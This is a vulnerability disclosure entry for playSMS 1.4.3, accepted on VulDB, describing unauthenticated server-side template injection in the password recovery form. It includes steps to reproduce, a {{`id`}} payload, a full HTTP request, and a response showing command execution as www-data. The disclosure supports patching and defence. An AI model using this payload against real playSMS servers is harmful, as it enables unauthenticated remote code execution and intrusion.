| Title | playSMS 1.4.3 Improper Handling of Parameters |
|---|
| Description | PlaySMS 1.4.3 has unauthenticated Server Side Template Injection in Recover password function. The manipulation of the argument "username", that leads to a Unauthenticated RCE
Path: The file /playsms/index.php?app=main&inc=core_auth&route=forgot&op=forgot of the component Template Handler
1. In login page click "Recover password" http://192.168.10.5/playsms/index.php?app=main&inc=core_auth&route=forgot
2. Add payload {{`id`}} in "username" and click in submit
# Burp request
POST /playsms/index.php?app=main&inc=core_auth&route=forgot&op=forgot HTTP/1.1
Host: 192.168.10.5
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Content-Type: application/x-www-form-urlencoded
Content-Length: 91
Origin: http://192.168.10.5
Connection: close
Referer: http://192.168.10.5/playsms/index.php?app=main&inc=core_auth&route=forgot
Cookie: PHPSESSID=49ft51qqg1nhpmve0496kdbsg3
Upgrade-Insecure-Requests: 1
X-CSRF-Token=117bd5b3b1b4eea8759e43b40877f492&username=%7B%7B%60id%60%7D%7D&email=&captcha=
# Response from RCE
<td><input type=text class=form-control placeholder="Username" name=username value='uid=33(www-data) gid=33(www-data) groups=33(www-data)' maxlength=100></td>
|
|---|
| User | Dhimitri (UID 45045) |
|---|
| Submission | 09/11/2024 03:45 (2 years ago) |
|---|
| Moderation | 09/15/2024 18:36 (5 days later) |
|---|
| Status | Accepted |
|---|
| VulDB entry | 277524 [playSMS 1.4.4/1.4.5/1.4.6/1.4.7 Template username/email/captcha code injection] |
|---|
| Points | 17 |
|---|